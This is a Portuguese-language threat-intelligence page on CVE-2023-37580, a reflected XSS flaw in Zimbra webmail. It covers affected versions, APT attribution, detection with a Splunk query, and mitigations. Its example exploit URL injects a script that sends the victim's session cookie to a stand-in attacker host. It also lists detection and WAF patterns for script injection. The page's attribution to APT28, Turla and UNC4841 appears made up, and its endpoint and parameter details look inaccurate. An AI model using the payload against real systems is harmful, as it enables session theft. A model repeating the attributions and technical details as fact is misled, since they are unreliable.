cve-2023-37580 - RunkIntel

# CVE-2023-37580 - Zimbra XSS Refletido Explorado por 4 Grupos APT > [!high] CVSS 6.1 - CISA KEV - Explorado por APT28, Winter Vivern, Turla e UNC4841 > XSS refletido no Zimbra Collaboration Suite 8.8.15 Classic UI explorado ativamente por quatro grupos de espionagem estatal distintos para roubo de sessão e credenciais em organizações governamentais e militares. ## Visão Geral **CVE-2023-37580** é uma vulnerabilidade de **Cross-Site Scripting (XSS) refletido** no **Zimbra Collaboration Suite (ZCS) 8.8.15** na interface Classic UI, descoberta e divulgada em julho de 2023. A falha reside no endpoint de autenticação do Zimbra, onde o parâmetro `loginErrorCode` não é adequadamente sanitizado antes de ser refletido na resposta HTML. Um atacante pode explorar a falha enviando um link malicioso — por e-mail de phishing ou mensagem direta — que, ao ser clicado pela vítima, executa JavaScript arbitrário no contexto autenticado do webmail. O que torna esta vulnerabilidade notável não é seu CVSS isolado, mas sim o seu **padrão de exploração por múltiplos atores de ameaça de nível estatal**. De acordo com análises do Google TAG (Threat Analysis Group), pelo menos **quatro grupos APT distintos** exploraram esta vulnerabilidade em campanhas ativas durante e após a janela de divulgação: APT28 (Rússia), Winter Vivern (Belarus/Rússia), Turla (Rússia) e UNC4841 (China). Este nível de interesse de múltiplos atores de espionagem simultaneamente é incomum e reflete o valor estratégico do Zimbra como plataforma de e-mail governamental. O Zimbra é especialmente popular em **setores governamentais, militares e educacionais** de países que buscam alternativas ao Microsoft Exchange, incluindo nações europeias, asiáticas e latino-americanas. Isso explica o apelo para grupos de espionagem: comprometer um servidor Zimbra governamental equivale a acesso direto a comúnicações oficiais confidenciais. A CISA adicionou esta CVE ao catálogo KEV em novembro de 2023, meses após a divulgação original, confirmando exploração persistente. ## Produtos Afetados | Vendor | Produto | Versão Afetada | Versão com Fix | |--------|---------|----------------|----------------| | Zimbra / Synacor | ZCS 8.8.15 Classic UI | < Patch 41 | 8.8.15 Patch 41 | | Zimbra / Synacor | ZCS 9.0 | Versões antes de hotfix específico | 9.0 com hotfix disponível | **Não afetado:** Zimbra ZCS com Modern UI exclusivo; instâncias com Patch 41 ou superior aplicado. ## Grupos APT que Exploraram esta CVE | Grupo | Nexo | Alvos Conhecidos | Objetivo | |-------|------|-----------------|----------| | [[g0007-apt28\|APT28]] | Rússia / GRU | Governo, defesa, OTAN | Espionagem, roubo de credenciais | | Winter Vivern | Belarus/Rússia | Governo Europa Oriental, OSCE | Espionagem, acesso a comúnicações | | [[turla\|Turla]] | Rússia / FSB | Governo, diplomacia | Implantação de backdoor via XSS | | UNC4841 | China | Governo, telecomúnicações | Espionagem persistente de longo prazo | Esta convergência de quatro grupos APT numa única CVE é rara e foi documentada pelo Google TAG em relatório de outubro de 2023. A exploração se iniciou em junho de 2023 - três semanas antes da divulgação pública oficial - indicando que ao menos alguns atores tinham conhecimento prévio (zero-day). ## Funcionamento Técnico ```mermaid graph TB A["📧 Atacante envia e-mail<br/>com link malicioso"] --> B["🔗 Vítima clica no link<br/>URL manipulada"] B --> C["🌐 Zimbra ClassicUI<br/>Endpoint /zimbra/h/calendar"] C --> D["⚠️ loginErrorCode não sanitizado<br/>XSS refletido na resposta"] D --> E["💉 JavaScript executado<br/>no contexto autenticado"] E --> F1["🍪 Roubo de cookie<br/>de sessão"] E --> F2["📝 Exfiltração de e-mails<br/>via AJAX"] E --> F3["🔑 Captura de credenciais<br/>via form injection"] classDef attack fill:#e74c3c,color:#ecf0f1 classDef vuln fill:#e67e22,color:#ecf0f1 classDef impact fill:#9b59b6,color:#ecf0f1 class A,B attack class C,D vuln class E,F1,F2,F3 impact ``` **Legenda:** [[t1185-browser-session-hijacking|T1185]] - [[t1539-steal-web-session-cookie|T1539]] - [[t1566-phishing|T1566]] **URL de exploração típica:** ``` https://zimbra.alvo.gov/zimbra/h/calendar?loginErrorCode=<script>document.location='https://c2.attacker.com/?c='+document.cookie</script> ``` O endpoint `/zimbra/h/calendar` (e variantes como `/zimbra/h/compose`) refletia o parâmetro `loginErrorCode` diretamente no HTML sem encodificação, permitindo injeção de payloads JavaScript. O ataque requer apenas um clique da vítima em um link enviado por e-mail ou mensagem. ## Detecção e Defesa **Indicadores de comprometimento:** - Requisições GET para `/zimbra/h/calendar`, `/zimbra/h/compose` ou endpoints similares com parâmetros codificados suspeitos (`%3C%73%63%72%69%70%74%3E`) - Sessões autenticadas com transferências HTTP incomuns para domínios externos - Acesso a dados de e-mail fora do horário habitual do usuário - Erros de autenticação seguidos de login bem-sucedido de IP diferente (session hijacking) **TTPs relacionadas:** - [[t1189-drive-by-compromise|T1189 - Drive-by Compromise]] - entrega via link em e-mail - [[t1185-browser-session-hijacking|T1185 - Browser Session Hijacking]] - sequestro de sessão autenticada - [[t1539-steal-web-session-cookie|T1539 - Steal Web Session Cookie]] - roubo de cookie de sessão - [[t1566-phishing|T1566 - Phishing]] - vetor de entrega do link malicioso **Splunk SPL:** ```spl index=web sourcetype=zimbra OR sourcetype=access_combined | search uri_path="/zimbra/h/calendar*" OR uri_path="/zimbra/h/compose*" | where match(uri_query, "(?i)%3cscript|<script|javascript:|onerror|onload") | stats count by src_ip, uri_path, uri_query | sort -count ``` ## Mitigação 1. **Patch obrigatório:** Atualizar Zimbra ZCS 8.8.15 para **Patch 41 ou superior** imediatamente 2. **Zimbra 9.x:** Aplicar hotfix específico disponível no portal Zimbra 3. **Modern UI:** Migrar usuários da Classic UI para Modern UI, que não é afetada pela falha 4. **WAF:** Implementar regras WAF para bloquear parâmetros contendo `<script>`, `javascript:` e variantes encoded 5. **CSP:** Implementar Content Security Policy rigorosa no servidor Zimbra para limitar execução de JavaScript inline 6. **Auditoria retroativa:** Revisar logs de acesso para períodos de junho a novembro de 2023 para identificar possível exploração anterior > [!latam] Relevância para Brasil e LATAM > O Zimbra é amplamente adotado em **universidades federais e estaduais brasileiras**, órgãos governamentais municipais e estaduais, e empresas de médio porte que preferem soluções de e-mail open-source e auto-hospedadas. No Brasil, a Rede Nacional de Ensino e Pesquisa (RNP) e diversas universidades utilizam ou utilizaram Zimbra como plataforma de e-mail institucional. A exploração desta CVE por grupos de espionagem estatal para acessar comúnicações governamentais é diretamente relevante para ministérios, autarquias e órgãos de segurança pública que utilizam Zimbra. Organizações LATAM devem verificar versão do Zimbra e aplicar patches com urgência, especialmente para instâncias com acesso público. ## Referências - [NVD - CVE-2023-37580](https://nvd.nist.gov/vuln/detail/CVE-2023-37580) - [CISA KEV Catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) - [Google TAG - Multiple APTs Exploiting Zimbra](https://blog.google/threat-analysis-group/tag-bulletin-q3-2023/) - [Zimbra Security Advisory](https://wiki.zimbra.com/wiki/Security_Center) - [[cve-2025-66376|CVE-2025-66376 - Zimbra ZCS XSS (2025)]]